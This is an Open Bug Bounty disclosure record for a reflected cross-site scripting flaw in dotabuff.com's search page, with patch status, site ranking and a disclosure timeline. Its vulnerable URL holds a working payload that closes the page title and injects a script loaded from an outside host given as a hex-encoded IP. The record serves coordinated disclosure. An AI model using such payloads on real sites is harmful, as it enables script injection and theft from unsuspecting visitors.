dotabuff.com XSS vulnerability

2015-07-07T00:24:00
ID OBB:70130
Type openbugbounty
Reporter crashdemons
Modified 2015-07-07T00:27:00

Description

Vulnerable URL:
http://www.dotabuff.com/search?utf8=%E2%9C%93&q;=xxx%3C/title%3E%3Cscript%20src=http://0xa2dcf06a/M/Xssposed%3E%3C/script%3E
Details:

Description| Value
---|---
Patched:| Yes, at 08.07.2015
Latest check for patch:| 08.07.2015 05:54 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3859
Google Pagerank| 4
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 7 July, 2015 00:24 GMT
Vulnerability existence verified and confirmed| 7 July, 2015 00:27 GMT